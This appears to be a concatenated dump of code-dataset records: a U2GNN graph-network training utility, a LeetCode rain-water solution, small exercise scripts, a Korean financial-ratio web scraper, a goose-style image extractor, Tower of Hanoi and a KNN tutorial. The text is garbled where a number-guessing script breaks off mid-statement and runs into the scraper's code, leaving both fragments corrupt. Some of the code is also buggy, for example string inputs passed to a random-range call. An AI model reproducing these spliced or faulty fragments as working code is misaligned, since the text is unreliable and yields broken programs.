self.test_mask = init_object\n self.args=args\n def __call__(self):\n train_idx = select_bs_indices_from_mask(self.train_mask, self.args.batch_size).to('cpu').numpy()\n \n X_concat, input_x, input_y = get_batch_data_node(self.graph, self.features, train_idx, self.args)\n return X_concat, input_x, input_y\n \n def get_validation_idx(self):\n return select_bs_indices_from_mask(self.test_mask,-1)\n \n def get_test_idx(self):\n return select_bs_indices_from_mask(self.test_mask,-1)\n \n def get_train_idx(self):\n return select_bs_indices_from_mask(self.train_mask,-1)\n\n\n\ndef select_bs_indices_from_mask(boolean_mask,bs):\n all_mask_idx = torch.where(boolean_mask==True)[0]\n if(bs>0):\n selected_idx = np.random.permutation(len(all_mask_idx))[:bs]\n return all_mask_idx[selected_idx]\n return all_mask_idx\n\n\n\n\ndef data_loading_util(args):\n # Load data\n print(\"Loading data...\")\n \n batch_nodes = Batch_Loader_node_classification(args)\n args.update(vocab_size=batch_nodes.features.shape[0])\n args.update(trainset_size=sum(batch_nodes.train_mask).item())\n args.update(feature_dim_size=batch_nodes.features.shape[1])\n data_args= {}\n data_args['batch_nodes'] = batch_nodes\n data_args = Namespace(**data_args)\n print(\"Loading data... 
finished!\")\n return data_args, args\n\ndef model_creation_util(parameterization,args):\n print(args.feature_dim_size)\n print(args.vocab_size)\n print(\"create model\")\n print(args.model_type)\n args.update(sampler_type = \"neighbor\")\n model_input_args = dict(feature_dim_size=args.feature_dim_size, ff_hidden_size=parameterization['ff_hidden_size'],\n dropout=parameterization['dropout'], num_self_att_layers=parameterization['num_timesteps'],\n vocab_size=args.vocab_size, sampled_num=parameterization['sampled_num'],\n num_U2GNN_layers=parameterization['num_hidden_layers'], device=args.device, sampler_type = args.sampler_type, loss_type = args.loss_type, adj_mat = args.adj_label,single_layer_only = args.single_layer_only, ml_model_type = args.ml_model_type, projection_dim = args.projection_dim)\n \n if(args.single_layer_only):\n if(args.model_type == 'u2gnn'):\n model = TransformerU2GNN(**model_input_args).to(args.device)\n elif(args.model_type == 'gcn'):\n model = TransformerGCN(**model_input_args).to(args.device)\n elif (args.model_type == \"gat\"):\n model = TransformerGAT(**model_input_args).to(args.device)\n else:\n raise ValueError(' {} isnt a valid model'.format(args.model_type))\n\n else:\n model = TransformerMLU2GNN(**model_input_args).to(args.device)\n \n optimizer = torch.optim.Adam(model.parameters(), lr=parameterization['learning_rate'])\n \n if(args.batch_size>0):\n num_batches_per_epoch = int((args.trainset_size- 1) // args.batch_size) + 1\n else:\n num_batches_per_epoch = 1\n print(\"model done\")\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=num_batches_per_epoch, gamma=0.1)\n model_args = {'model':model, 'optimizer':optimizer, 'num_batches_per_epoch':num_batches_per_epoch, 'scheduler':scheduler}\n \n return Namespace(**model_args)\n\ndef loss_func(args, logits):\n if(args.loss_type == 'default'):\n embeds = logits[0]\n loss = torch.sum(embeds)\n \n elif(args.loss_type == 'gae'):\n embeds = logits[0]\n A_pred = torch.sigmoid(torch.matmul(embeds, embeds.t()))\n loss = args.norm*F.binary_cross_entropy(A_pred.view(-1), args.adj_label.view(-1), weight = args.weight_tensor)\n elif( args.loss_type == \"contrastive\"):\n loss = logits[0]\n return loss\n \ndef single_epoch_training_util(data_args, model_args, args):\n model_args.model.train() # Turn on the train mode\n total_loss = 0.\n for _ in range(model_args.num_batches_per_epoch):\n X_concat, input_x, input_y = data_args.batch_nodes()\n model_args.optimizer.zero_grad()\n if(args.single_layer_only):\n logits = model_args.model(X_concat, input_x, input_y, args)\n print(\"forward pass done for single layer\")\n loss = loss_func(args,logits)\n else:\n loss, _ = model_args.model(X_concat, input_x, input_y, args)\n print(\"forward pass done for multi layers\")\n \n loss.backward()\n print(\"backward pass done\")\n #torch.nn.utils.clip_grad_norm_(model_args.model.parameters(), 0.5)\n model_args.optimizer.step()\n total_loss += loss.item()\n\n return total_loss\n\n\ndef get_node_embeddings(data_args, model_args, args):\n model = model_args.model\n model.eval()\n if(args.loss_type == 'default'):\n \n return model.ss.weight.to('cpu')\n \n elif(args.loss_type == 'gae'):\n X_concat, input_x, input_y = data_args.batch_nodes()\n return model(X_concat, input_x, input_y, args)[1].detach().to('cpu')\n elif( args.loss_type == \"contrastive\"):\n X_concat, input_x, input_y = data_args.batch_nodes()\n return model(X_concat, input_x, input_y, args)[1].detach().to('cpu')\n\ndef evaluate(epoch, data_args, model_args, args):\n 
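\"\"\"Score the current node embeddings, using either a logistic-regression probe or k-means, averaged over 2 folds.\"\"\"\n    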
model = model_args.model\n model.eval() # Turn on the evaluation mode\n with torch.no_grad():\n # evaluating\n node_embeddings = get_node_embeddings(data_args, model_args, args)\n acc_10folds = []\n for fold_idx in range(2):\n if(args.eval_type==\"logistic\"): \n train_idx = data_args.batch_nodes.get_train_idx()\n test_idx = data_args.batch_nodes.get_test_idx()\n train_node_embeddings = node_embeddings[train_idx]\n\n test_node_embeddings = node_embeddings[test_idx]\n train_labels = data_args.batch_nodes.label[train_idx]\n test_labels = data_args.batch_nodes.label[test_idx]\n\n cls = LogisticRegression(solver=\"liblinear\", tol=0.001)\n cls.fit(train_node_embeddings, train_labels)\n ACC = cls.score(test_node_embeddings, test_labels)\n elif(args.eval_type==\"kmeans\"):\n ACC = print_evaluation_from_embeddings(y_true = data_args.batch_nodes.label.numpy(), embeddings = node_embeddings)\n acc_10folds.append(ACC)\n print('epoch ', epoch, ' fold ', fold_idx, ' acc ', ACC)\n\n mean_10folds = statistics.mean(acc_10folds)\n std_10folds = statistics.stdev(acc_10folds)\n # print('epoch ', epoch, ' mean: ', str(mean_10folds), ' std: ', str(std_10folds))\n\n return mean_10folds, std_10folds\n\n\ndef train_evaluate(data_args,model_args,args):\n cost_loss = []\n mean_10folds_best = -1\n std_10folds_best = -1\n train_loss = 0.0\n for epoch in range(1, args.num_epochs + 1):\n epoch_start_time = time.time()\n train_loss = single_epoch_training_util(data_args, model_args, args)\n cost_loss.append(train_loss)\n mean_10folds, std_10folds = evaluate(epoch, data_args, model_args, args)\n print('| epoch {:3d} | time: {:5.2f}s | loss {:5.2f} | mean {:5.2f} | std {:5.2f} | '.format(\n epoch, (time.time() - epoch_start_time), train_loss, mean_10folds*100, std_10folds*100))\n if epoch > 5 and cost_loss[-1] > np.mean(cost_loss[-6:-1]):\n model_args.scheduler.step()\n if(mean_10folds>mean_10folds_best):\n \n mean_10folds_best = mean_10folds\n std_10folds_best = std_10folds\n return mean_10folds_best, std_10folds_best","sub_path":"U2GNN_pytorch/ml_node_train_utils.py","file_name":"ml_node_train_utils.py","file_ext":"py","file_size_in_byte":16605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"412134874","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n n = len(height)\n if n <= 1:\n return 0\n left_max = [0] * n\n right_max = [0] * n\n l_max, r_max = float('-inf'), float('-inf')\n \n for i in range(n-2,-1,-1):\n r_max = max(height[i+1], r_max)\n right_max[i] = r_max\n \n for i in range(1, n):\n l_max = max(height[i-1], l_max)\n left_max[i] = l_max\n \n \n res = 0\n for i in range(1, n-1):\n if height[i] < left_max[i] and height[i] < right_max[i]:\n res += (min(left_max[i], right_max[i]) -height[i])\n return res\n ","sub_path":"Leetcode_250/Problem_42/learning_solution.py","file_name":"learning_solution.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546532666","text":"n = int(input())\ndishes = [input() for _ in range(n)]\n\nn_melon = 0\neat_count = 0\nis_ready = True\nfor dish in dishes:\n if eat_count > 0:\n is_ready = False\n else:\n is_ready = True\n\n if (dish == \"melon\") and is_ready:\n n_melon += 1\n eat_count = 10\n else:\n eat_count -= 1\n \nprint(n_melon)","sub_path":"paiza/C062.py","file_name":"C062.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
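The trap record above precomputes left_max and right_max arrays, which costs O(n) extra space. For reference, a minimal sketch of the equivalent two-pointer variant that keeps only two running maxima; this is illustrative only, assumes the same list-of-ints input, and is not taken from any record in this file:

def trap_two_pointer(height):
    # equivalent two-pointer formulation: O(n) time, O(1) extra space
    left, right = 0, len(height) - 1
    left_max = right_max = 0
    total = 0
    while left < right:
        if height[left] < height[right]:
            # the left bar is the limiting side; the water level here is left_max
            left_max = max(left_max, height[left])
            total += left_max - height[left]
            left += 1
        else:
            right_max = max(right_max, height[right])
            total += right_max - height[right]
            right -= 1
    return total

# usage example (hypothetical input): the classic elevation map traps 6 units
assert trap_two_pointer([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]) == 6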
+{"seq_id":"228336037","text":"#coding:utf-8\n\nimport random\n#产生一个随机数X\n# 0 x=36 y=57 100\nin1 = input(\"请输入最小范围\")\nin2 = input(\"请输入最大范围\")\ny = random.randint (in1,in2)\n#print y\nmin = in1\nmax = in2\nind = 0\nwhile 1:\n ind +=1\n x = input(\":>\")\n if x==y: \n print (\"恭喜你,猜对了!\")\n break\n if x>y:\n max=x\n print (\"%s---%s\"%(min,max))\n if x 0:연간, 1:분기\n param = {\n 'pGB': 'S7',\n 'cID': 'S7',\n 'MenuYn': 'N',\n 'ReportGB': 'D',\n 'NewMenuID': '15',\n 'stkGb': '701',\n }\n\n def __init__(self, delay=1):\n self.logger = logger.APP_LOGGER\n self.delay = delay\n\n def crawl_fnguide(self, cmp_cd):\n self.logger.debug(f'Fnguide crawling start')\n\n header = {\n 'Host': 'comp.fnguide.com',\n }\n result = []\n cmp_dict = dict()\n gicode = 'A%06d'%int(cmp_cd)\n cmp_dict['code'] = cmp_cd\n\n for url in [INVEST_URL, FINANCE_RATIO_URL]:\n res = requests.get(f'{url}?gicode={gicode}', headers=header)\n soup = BeautifulSoup(res.text, 'lxml')\n table_list = soup.find_all('table', attrs={'class': 'us_table_ty1'})\n for tb in table_list:\n trs = tb.find_all('tr')[1:]\n for tr in trs:\n td = list(tr.children)\n\n if int(td[1].attrs.get('colspan', 0)) > 0:\n continue\n\n # 지표 key-value\n key = td[1].find_all('span', attrs={'class': 'txt_acd'})\n if len(key) > 0:\n key = key[0].text\n else:\n key = td[1].text\n key = key.strip()\n\n val = td[-2].text.strip()\n if key == 'EV/EBITDA': # 1년주기여서, 작년기준으로 사용\n val = td[-4].text.strip()\n if len(val) > 0:\n try:\n cmp_dict[key] = float(val.replace(',', ''))\n except:\n pass\n result.append(cmp_dict)\n\n timer.random_sleep(min_delay=self.delay)\n\n df_result = pd.DataFrame(result)\n try:\n df_result = df_result[['code', 'EPS', 'CFPS', 'BPS', 'SPS', 'EV/EBITDA', 'ROE']]\n except KeyError:\n self.logger.debug(f\"{df_result[['code']]}, KeyError : ['EV/EBITDA'] not in index\")\n df_result = None\n\n self.logger.debug(f'Fnguide crawling complete')\n return df_result\n","sub_path":"crawler/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"583378585","text":"#initialize the world\r\nfrom cs1robots import *\r\ncreate_world()\r\nhubo = Robot()\r\n\r\nhubo.set_trace(\"blue\")\r\nhubo.set_pause(.1)\r\n\r\ndef turn_right():\r\n for i in range(3):\r\n hubo.turn_left()\r\n \r\n#hubo will run entire screen\r\ndef run_straight():\r\n for i in range(9):\r\n hubo.move()\r\n\r\n#define the very first loop, from bottom to top to bottom \r\ndef loop():\r\n hubo.turn_left() #face up\r\n run_straight() #go to top\r\n turn_right() #face right\r\n hubo.move() #one step forward\r\n turn_right() #face down\r\n run_straight() #go to bottom\r\n hubo.turn_left() #face right\r\n \r\n#will loop 5 times\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\n","sub_path":"Week1/Week1_p1.py","file_name":"Week1_p1.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50690834","text":"# -*- coding: utf-8 -*-\nimport re\nimport operator\nfrom urlparse import urlparse, urljoin\nfrom goose.utils import FileHelper\nfrom goose.parsers import Parser\nfrom goose.images.Image import Image\nfrom goose.images.ImageUtils import ImageUtils\n\nKNOWN_IMG_DOM_NAMES = [\n \"yn-story-related-media\",\n \"cnn_strylccimg300cntr\",\n \"big_photo\",\n \"ap-smallphoto-a\",\n]\n\n\nclass DepthTraversal(object):\n \n def __init__(self, 
node, parentDepth, siblingDepth):\n self.node = node\n self.parentDepth = parentDepth\n self.siblingDepth = siblingDepth\n\n\nclass ImageExtractor(object):\n pass\n \n\n\nclass UpgradedImageIExtractor(ImageExtractor):\n \n def __init__(self, httpClient, article, config):\n self.customSiteMapping = {}\n self.loadCustomSiteMapping()\n \n # article\n self.article = article\n \n # config\n self.config = config\n \n # What's the minimum bytes for an image we'd accept is\n self.minBytesForImages = 4000\n \n # the webpage url that we're extracting content from\n self.targetUrl = article.finalUrl\n \n # stores a hash of our url for \n # reference and image processing\n self.linkhash = article.linkhash\n \n # this lists all the known bad button names that we have\n self.matchBadImageNames = re.compile(\n \".html|.gif|.ico|button|twitter.jpg|facebook.jpg|ap_buy_photo\"\n \"|digg.jpg|digg.png|delicious.png|facebook.png|reddit.jpg\"\n \"|doubleclick|diggthis|diggThis|adserver|/ads/|ec.atdmt.com\"\n \"|mediaplex.com|adsatt|view.atdmt\"\n )\n \n \n def getBestImage(self, doc, topNode):\n image = self.checkForKnownElements()\n if image:\n return image\n \n image = self.checkForLargeImages(topNode, 0, 0)\n if image:\n return image\n \n image = self.checkForMetaTag()\n if image:\n return image\n return Image()\n \n \n \n def checkForMetaTag(self):\n image = self.checkForLinkTag()\n if image:\n return image\n image = self.checkForOpenGraphTag()\n if image:\n return image\n \n \n def checkForLargeImages(self, node, parentDepthLevel, siblingDepthLevel):\n \"\"\"\\\n although slow the best way to determine the best image is to download\n them and check the actual dimensions of the image when on disk\n so we'll go through a phased approach...\n 1. get a list of ALL images from the parent node\n 2. filter out any bad image names that we know of (gifs, ads, etc..)\n 3. do a head request on each file to make sure it meets \n our bare requirements\n 4. any images left over let's do a full GET request, \n download em to disk and check their dimensions\n 5. 
Score images based on different factors like height/width \n and possibly things like color density\n \"\"\"\n goodImages = self.getImageCandidates(node)\n \n if goodImages:\n scoredImages = self.downloadImagesAndGetResults(goodImages, parentDepthLevel)\n if scoredImages:\n highScoreImage = sorted(scoredImages.items(), \n key=lambda x: x[1], reverse=True)[0][0]\n mainImage = Image()\n mainImage.imageSrc = highScoreImage.imgSrc\n mainImage.imageExtractionType = \"bigimage\"\n mainImage.confidenceScore = 100 / len(scoredImages) \\\n if len(scoredImages) > 0 else 0\n return mainImage\n \n depthObj = self.getDepthLevel(node, parentDepthLevel, siblingDepthLevel)\n if depthObj:\n return self.checkForLargeImages(depthObj.node, \n depthObj.parentDepth, depthObj.siblingDepth)\n \n return None\n \n \n def getDepthLevel(self, node, parentDepth, siblingDepth):\n MAX_PARENT_DEPTH = 2\n if parentDepth > MAX_PARENT_DEPTH:\n return None\n else:\n siblingNode = Parser.previousSibling(node)\n if siblingNode is not None:\n return DepthTraversal(siblingNode, parentDepth, siblingDepth + 1)\n elif node is not None:\n parent = Parser.getParent(node)\n if parent is not None:\n return DepthTraversal(parent, parentDepth + 1, 0)\n return None\n \n \n def downloadImagesAndGetResults(self, images, depthLevel):\n \"\"\"\\\n download the images to temp disk and set their dimensions\n - we're going to score the images in the order in which \n they appear so images higher up will have more importance,\n - we'll count the area of the 1st image as a score \n of 1 and then calculate how much larger or small each image after it is\n - we'll also make sure to try and weed out banner \n type ad blocks that have big widths and small heights or vice versa\n - so if the image is 3rd found in the dom it's \n sequence score would be 1 / 3 = .33 * diff \n in area from the first image\n \"\"\"\n imageResults = {}\n initialArea = float(0.0)\n totalScore = float(0.0)\n cnt = float(1.0)\n MIN_WIDTH = 50\n for image in images[:30]:\n imgSrc = Parser.getAttribute(image, attr='src')\n imgSrc = self.buildImagePath(imgSrc)\n locallyStoredImage = self.getLocallyStoredImage(imgSrc)\n width = locallyStoredImage.width\n height = locallyStoredImage.height\n imageSrc = locallyStoredImage.imgSrc\n fileExtension = locallyStoredImage.fileExtension\n \n if fileExtension != '.gif' or fileExtension != 'NA':\n if (depthLevel >= 1 and locallyStoredImage.width > 300) or depthLevel < 1:\n if not self.isBannerDimensions(width, height):\n if width > MIN_WIDTH:\n sequenceScore = float(1.0 / cnt)\n area = float(width * height)\n totalScore = float(0.0)\n \n if initialArea == 0:\n initialArea = area * float(1.48)\n totalScore = 1\n else:\n areaDifference = float(area / initialArea)\n totalScore = sequenceScore * areaDifference\n \n imageResults.update({locallyStoredImage:totalScore})\n cnt += 1\n cnt += 1\n return imageResults\n \n \n def getAllImages(self):\n return None\n \n \n def isBannerDimensions(self, width, height):\n \"\"\"\\\n returns true if we think this is kind of a bannery dimension\n like 600 / 100 = 6 may be a fishy dimension for a good image\n \"\"\"\n if width == height:\n return False\n \n if width > height:\n diff = float(width / height)\n if diff > 5:\n return True\n \n if height > width:\n diff = float(height / width)\n if diff > 5:\n return True\n \n return False\n \n \n def getImagesFromNode(self, node):\n images = Parser.getElementsByTag(node, tag='img')\n if images is not None and len(images) < 1:\n return None\n return images\n \n \n 
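# the next helper drops img elements whose src matches the known-bad-name regex (buttons, ads, social icons)\n    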
def filterBadNames(self, images):\n \"\"\"\\\n takes a list of image elements \n and filters out the ones with bad names\n \"\"\"\n goodImages = []\n for image in images:\n if self.isOkImageFileName(image):\n goodImages.append(image)\n return goodImages if len(goodImages) > 0 else None\n \n \n def isOkImageFileName(self, imageNode):\n \"\"\"\\\n will check the image src against a list \n of bad image files we know of like buttons, etc...\n \"\"\"\n imgSrc = Parser.getAttribute(imageNode, attr='src')\n \n if not imgSrc:\n return False\n \n if self.matchBadImageNames.search(imgSrc):\n return False\n \n return True\n \n \n def getImageCandidates(self, node):\n goodImages = []\n filteredImages = []\n images = self.getImagesFromNode(node)\n if images:\n filteredImages = self.filterBadNames(images)\n if filteredImages:\n goodImages = self.findImagesThatPassByteSizeTest(filteredImages)\n return goodImages\n \n \n def findImagesThatPassByteSizeTest(self, images):\n \"\"\"\\\n loop through all the images and find the ones \n that have the best bytez to even make them a candidate\n \"\"\"\n cnt = 0\n MAX_BYTES_SIZE = 15728640\n goodImages = []\n for image in images:\n if cnt > 30:\n return goodImages\n imgSrc = Parser.getAttribute(image, attr='src')\n imgSrc = self.buildImagePath(imgSrc)\n locallyStoredImage = self.getLocallyStoredImage(imgSrc)\n if locallyStoredImage:\n bytes = locallyStoredImage.bytes\n if (bytes == 0 or bytes > self.minBytesForImages) \\\n and bytes < MAX_BYTES_SIZE:\n goodImages.append(image)\n else:\n images.remove(image)\n cnt += 1\n return goodImages if len(goodImages) > 0 else None \n \n \n def getNode(self, node):\n return node if node else None\n \n \n def checkForLinkTag(self):\n \"\"\"\\\n checks to see if we were able to \n find open link_src on this page\n \"\"\"\n node = self.article.rawDoc\n meta = Parser.getElementsByTag(node, tag='link', attr='rel', value='image_src')\n for item in meta:\n href = Parser.getAttribute(item, attr='href')\n if href:\n mainImage = Image()\n mainImage.imageSrc = href\n mainImage.imageExtractionType = \"linktag\"\n mainImage.confidenceScore = 100\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n return mainImage\n return None\n \n \n \n def checkForOpenGraphTag(self):\n \"\"\"\\\n checks to see if we were able to \n find open graph tags on this page\n \"\"\"\n node = self.article.rawDoc\n meta = Parser.getElementsByTag(node, tag='meta', attr='property', value='og:image')\n for item in meta:\n href = Parser.getAttribute(item, attr='content')\n if href:\n mainImage = Image()\n mainImage.imageSrc = href\n mainImage.imageExtractionType = \"opengraph\"\n mainImage.confidenceScore = 100\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n return mainImage\n return None\n \n \n def getLocallyStoredImage(self, imageSrc):\n \"\"\"\\\n returns the bytes of the image file on disk\n \"\"\"\n locallyStoredImage = ImageUtils.storeImageToLocalFile(None, \n self.linkhash, imageSrc, self.config)\n return locallyStoredImage\n \n \n def getCleanDomain(self):\n return self.article.domain.replace('www.', '')\n \n \n def checkForKnownElements(self):\n \"\"\"\\\n in here we check for known image 
contains from sites \n we've checked out like yahoo, techcrunch, etc... that have\n * known places to look for good images.\n * TODO: enable this to use a series of settings files \n so people can define what the image ids/classes \n are on specific sites\n \"\"\"\n domain = self.getCleanDomain()\n if domain in self.customSiteMapping.keys():\n classes = self.customSiteMapping.get(domain).split('|')\n for classname in classes:\n KNOWN_IMG_DOM_NAMES.append(classname)\n \n knownImage = None\n \n for knownName in KNOWN_IMG_DOM_NAMES:\n known = Parser.getElementById(self.article.rawDoc, knownName)\n if not known:\n known = Parser.getElementsByTag(self.article.rawDoc, \n attr='class', value=knownName)\n if known: known = known[0]\n if known:\n mainImage = Parser.getElementsByTag(known, tag='img')\n if mainImage:\n knownImage = mainImage[0]\n \n \n if knownImage is not None:\n knownImgSrc = Parser.getAttribute(knownImage, attr='src')\n mainImage = Image()\n mainImage.imageSrc = self.buildImagePath(knownImgSrc)\n mainImage.imageExtractionType = \"known\"\n mainImage.confidenceScore = 90\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n \n return mainImage\n \n \n def buildImagePath(self, imageSrc):\n \"\"\"\\\n This method will take an image path and build \n out the absolute path to that image\n * using the initial url we crawled \n so we can find a link to the image \n if they use relative urls like ../myimage.jpg\n \"\"\"\n o = urlparse(imageSrc)\n # we have a full url\n if o.hostname :\n return o.geturl()\n # we have a relative url\n return urljoin(self.targetUrl, imageSrc)\n \n \n \n def loadCustomSiteMapping(self):\n # TODO\n dataFile = FileHelper.loadResourceFile(\"images/known-image-css.txt\", \"xx\")\n lines = dataFile.splitlines()\n for line in lines:\n domain, css = line.split('^')\n self.customSiteMapping.update({domain:css})\n \n \n \n \n ","sub_path":"goose/images/UpgradedImageExtractor.py","file_name":"UpgradedImageExtractor.py","file_ext":"py","file_size_in_byte":14860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286040374","text":"\"\"\"\nproblem: 河內塔\ndexcription:\n 有三根杆子A,B,C。\n A杆上有 N 個 (N>1) 穿孔圓盤,盤的尺寸由下到上依次變小。\n 將所有圓盤移至 C 杆,\n 每次只能移動一個圓盤,\n 大盤不能疊在小盤上面。\n\"\"\"\n\nimport os, time\n\nA = [i for i in range(5,0,-1)]\nB = []\nC = []\n\ndef show():\n os.system(\"clear\")\n print(A, B, C, sep=\"\\n\")\n time.sleep(0.75)\n\ndef hanoi(x, start, middle, end):\n if (x == 1):\n end.append(start.pop())\n show()\n else:\n hanoi(x-1, start, end, middle)\n hanoi(1, start, middle, end)\n hanoi(x-1, middle, start, end)\n\nshow()\nhanoi(len(A), A, B, C)\n","sub_path":"problems/tower_of_hanoi.py","file_name":"tower_of_hanoi.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"274233091","text":"#coding:utf-8\n\"\"\"\nauthor: hxtkyne\nsource: https://github.com/hxtkyne\nreference: machine learning alogrithms\ndescription: knn算法\n在这个主题中,我们将学会\n(1)如何计算数据之间的相似性\n(2)如何利用最相似的特征进行预测\n(3)如何利用knn算法进行分类和回归问题\n思路:一次性存储所有训练数据,当需要预测时,找到k个最相似的训练集,然后取最多的结果或者\n取平均进行处理\n\n扩展:\n(1)调试knn参数,n_neighbors\n(2)结合regression和classification问题\n(3)更多的距离衡量\n(4)数据准备和清洗,标准化,归一化?\n(5)对更多问题进行实验分析\n\"\"\"\nimport math\n\n# 欧拉距离,注意最后一列是输出信息(类别)\ndef euclidean_distance(row1, row2):\n\tdistance = 
0.0\n\tfor i in range(len(row1)-1):\n\t\tdistance += (row1[i] - row2[i])**2\n\treturn math.sqrt(distance)\n\n# collect the num_neighbors closest training rows\ndef get_neighbors(train, test_row, num_neighbors):\n\tdistances = list()\n\tfor train_row in train:\n\t\tdist = euclidean_distance(test_row, train_row)\n\t\tdistances.append((train_row, dist)) # store as a tuple\n\t# sort the tuples by their second element (the distance), ascending\n\tdistances.sort(key=lambda tup: tup[1])\n\tneighbors = list()\n\tfor i in range(num_neighbors):\n\t\tneighbors.append(distances[i][0])\n\treturn neighbors\n\n# classification: predict the majority class among the neighbors\ndef predict_classification(train, test_row, num_neighbors):\n\tneighbors = get_neighbors(train, test_row, num_neighbors)\n\toutput_values = [row[-1] for row in neighbors]\n\t# max over the unique labels, keyed by how often each label occurs\n\tprediction = max(set(output_values), key=output_values.count)\n\treturn prediction\n\n# regression: predict the mean of the neighbors' outputs\ndef predict_regression(train, test_row, num_neighbors):\n\tneighbors = get_neighbors(train, test_row, num_neighbors)\n\toutput_values = [row[-1] for row in neighbors]\n\t# cast to float so the division is not integer division\n\tprediction = sum(output_values) / float(len(output_values))\n\treturn prediction\n\n# classification on the Abalone dataset\nfrom random import seed\nfrom random import randrange\nfrom csv import reader\n\n# load dataset\ndef load_csv(filename):\n\tdataset = []\n\twith open(filename, 'r') as file:\n\t\tcsv_reader = reader(file)\n\t\tfor row in csv_reader:\n\t\t\tif not row:\n\t\t\t\tcontinue\n\t\t\tdataset.append(row)\n\t\treturn dataset\n\n# convert string column to float\ndef str_column_to_float(dataset, column):\n\tfor row in dataset:\n\t\t# strip() removes leading/trailing characters (whitespace by default)\n\t\trow[column] = float(row[column].strip())\n\n# convert string column to integer, such as sex\ndef str_column_to_int(dataset, column):\n\tclass_values = [row[column] for row in dataset]\n\tunique = set(class_values)\n\tlookup = {}\n\t# for example, {man:0, woman:1}\n\tfor i, value in enumerate(unique):\n\t\tlookup[value] = i\n\tfor row in dataset:\n\t\trow[column] = lookup[row[column]]\n\treturn lookup\n\n# find min and max for each column\ndef dataset_minmax(dataset):\n\tminmax = []\n\t# each row represents a sample\n\tfor i in range(len(dataset[0])):\n\t\tcol_values = [row[i] for row in dataset]\n\t\tvalue_min = min(col_values)\n\t\tvalue_max = max(col_values)\n\t\tminmax.append((value_min, value_max)) # append as a tuple; list.append takes a single argument\n\treturn minmax\n\n# scale columns to [0,1]\ndef normalize_dataset(dataset, minmax):\n\tfor row in dataset:\n\t\tfor i in range(len(row)):\n\t\t\trow[i] = (row[i] - minmax[i][0]) / (minmax[i][1] - minmax[i][0])\n\n# split a dataset into k folds\ndef cross_validation_split(dataset, n_folds):\n\tdataset_split = []\n\tdataset_copy = list(dataset)\n\tfold_size = int(len(dataset) / n_folds)\n\tfor i in range(n_folds):\n\t\tfold = list()\n\t\twhile len(fold) < fold_size:\n\t\t\t# pick a random remaining row; pop removes it, so rows are not reused\n\t\t\tindex = randrange(len(dataset_copy))\n\t\t\t# pop returns the removed element\n\t\t\tfold.append(dataset_copy.pop(index))\n\t\tdataset_split.append(fold)\n\treturn dataset_split\n\n# compute classification accuracy as a percentage\ndef accuracy_metric(actual, predicted):\n\tcorrect = 0\n\tfor i in range(len(actual)):\n\t\tif actual[i] == predicted[i]:\n\t\t\tcorrect += 1\n\treturn correct / float(len(actual)) * 100.0\n\n# evaluate the algorithm with k-fold cross validation\ndef evaluate_algorithm(dataset, alogrithm, metric, n_folds, *args):\n\tfolds = cross_validation_split(dataset, n_folds)\n\tscores = []\n\tfor fold in folds:\n\t\ttrain_set = list(folds)\n\t\ttrain_set.remove(fold)\n\t\t# flatten the list of folds into a single training list\n\t\ttrain_set = sum(train_set, [])\n\t\ttest_set = []\n\t\tfor row in fold:\n\t\t\trow_copy = 
list(row)\n\t\t\ttest_set.append(row_copy)\n\t\t\trow_copy[-1] = None\n\t\tpredicted = alogrithm(train_set, test_set, *args)\n\t\tactual = [row[-1] for row in fold]\n\t\taccuracy = metric(actual, predicted)\n\t\tscores.append(accuracy)\n\t\tprint('accuracy: ', accuracy)\n\treturn scores\n\n# KNN Algorithm\ndef k_nearest_neighbors(train, test, num_neighbors):\n\tpredicted = []\n\tfor row in test:\n\t\toutput = predict_classification(train, row, num_neighbors)\n\t\tpredicted.append(output)\n\treturn predicted\n\n# classification test\ndef classify_test():\n\tseed(1)\n\tfilename = './data/abalone.data.csv'\n\tdataset = load_csv(filename)\n\tfor i in range(1,len(dataset[0])):\n\t\tstr_column_to_float(dataset,i)\n\tstr_column_to_int(dataset, 0)\n\tn_folds = 10\n\tnum_neighbors = 10\n\tscores = evaluate_algorithm(dataset, k_nearest_neighbors, accuracy_metric, n_folds, num_neighbors)\n\tprint('Score: {}'.format(scores))\n\tprint('Mean Accuracy: %.3f%%' %(sum(scores)/float(len(scores))))\n\n# Abalone数据集进行回归\n# 计算均方误差\ndef rmse_metric(actual, predicted):\n\tsum_error = 0.0\n\tfor i in range(len(actual)):\n\t\tprediction_error = predicted[i] - actual[i]\n\t\tsum_error += (prediction_error) ** 2\n\tmean_error = sum_error / float(len(actual))\n\treturn math.sqrt(mean_error)\n\ndef k_nearest_neighbors_regression(train, test, num_neighbors):\n\tpredicted = []\n\tfor row in test:\n\t\toutput = predict_regression(train, row, num_neighbors)\n\t\tpredicted.append(output)\n\treturn predicted\n\ndef regression_test():\n\tseed(1)\n\tfilename = './data/abalone.data.csv'\n\tdataset = 